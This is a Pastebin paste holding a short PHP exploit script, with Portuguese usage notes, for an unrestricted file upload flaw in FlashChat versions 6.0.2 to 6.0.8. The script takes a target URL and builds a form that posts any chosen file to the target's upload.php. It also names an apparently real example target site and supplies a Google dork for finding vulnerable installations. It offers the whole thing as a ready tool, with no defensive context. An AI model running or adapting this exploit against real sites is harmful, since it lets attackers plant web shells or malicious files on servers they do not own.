SHARE
TWEET

Exploit: FlashChat File Upload

Googleinurl Oct 14th, 2013 790 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. error_reporting(0);
  4. set_time_limit(0);
  5. ini_set('display_errors', 0);
  6. ini_set('max_execution_time', 0);
  7. ini_set('allow_url_fopen', 1);
  8. echo
  9. '<pre>
  10. Exploit: FlashChat File Upload.
  11. Software Link0x3A3A3A3A http://www.tufat.com/script2.htm
  12. Vs0x3A3A3A3A v6.0.8, v6.0.2, v6.0.4, v6.0.5, v6.0.6, v6.0.7
  13.  
  14. Modo de uso0x3A3A3A3A
  15. Defina url alvo http://alvo//pasta/chat/ ou http://alvo/chat/
  16. Usando:    
  17. http://localhost/exploit.php?url=http://www.thenorfolkbroads.org/forum/chat/
  18.  
  19. REF:<a href="http://www.exploit-db.com/exploits/28709/">http://www.exploit-db.com/exploits/28709/</a>
  20.  
  21. DORK[0]0x3A3A3A3A intitle:"FlashChat v6.0.8" ext:php
  22. By0x3A3A3A3A GoogleINURL
  23. </pre>
  24. ';
  25. $url = (isset($_GET['url']) && !empty($_GET['url']) ? $_GET['url'] : EXIT());
  26.  
  27. echo "Alvo atual:: {$url}<br><br>";
  28. ?>
  29.  
  30. <form action='<?php echo "{$url}upload.php" ?>' method="post" enctype="multipart/form-data">
  31. <label for="file">Arquivo de upload:</label><br>
  32. <input type="file" name="file" id="file"><br>
  33. <input type="submit" name="submit" value="Submit">
  34. </form>
RAW Paste Data
Top